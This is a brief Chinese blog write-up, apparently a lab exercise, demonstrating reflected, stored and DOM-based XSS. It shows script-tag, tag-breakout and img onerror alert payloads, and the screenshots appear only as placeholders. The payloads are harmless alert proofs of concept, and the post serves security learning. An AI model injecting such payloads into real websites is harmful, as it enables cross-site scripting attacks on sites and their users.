xss02-master

1.反射型XSS

image
直接输入<script>alert(111)</script>弹窗失败。
查看源码:
image
构造闭合后再次尝试"><script>alert(111)</script>
image

2.存储型XSS

注册一个test用户:
image
登录成功后的页面:
image
留言输入恶意弹窗<script>alert(111)</script>
image
创建另一个zhangsan用户,去访问留言板:
image

3.DOM型XSS

image
先尝试输入<script>alert(1)</script>/被转义了。
image
尝试获取domain:xss_input_value=<img src=1 onerror=alert(document.domain)>
image

posted @ 2026-01-12 19:56  77板烧鸡腿堡  阅读(4)  评论(0)    收藏  举报